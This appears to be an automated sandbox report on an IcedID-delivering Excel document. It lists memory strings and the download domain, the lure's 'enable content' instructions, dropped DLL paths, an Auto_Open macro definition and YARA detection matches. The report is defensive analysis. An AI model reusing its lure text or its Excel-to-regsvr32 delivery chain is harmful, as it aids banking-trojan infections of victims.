  Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Source: regsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp | String found in binary or memory: http://astrocycle.download/
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: regsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp | String found in binary or memory: http://crt.rootg2.amazontrust.com/root
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://o.ss2.us/0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://s.ss2.us/r.crl0
Source: regsvr32.exe, 00000004.00000002.2097777850.0000000002C20000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2089572858.0000000001E80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096640594.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2097273567.0000000001C30000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2097777850.0000000002C20000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: http://x.ss2.us/x.cer0&
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: https://amazon.com/
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp | String found in binary or memory: https://aws.amazon.com/
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/ar/
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/cn/
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/de/
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/es/
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/fr/
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/id/
Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093300984.0000000000276000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/lr
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
            Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443

            E-Banking Fraud:

Yara detected IcedID
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2828, type: MEMORY

            System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content button from the yellow bar above
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_004D1678 NtQuerySystemInformation,RtlAllocateHeap
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_004D1810
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000007FEF8FB15D0
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000007FEF8FB41BF
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
Source: workbook.xml | Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
Source: 4.2.regsvr32.exe.4d0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
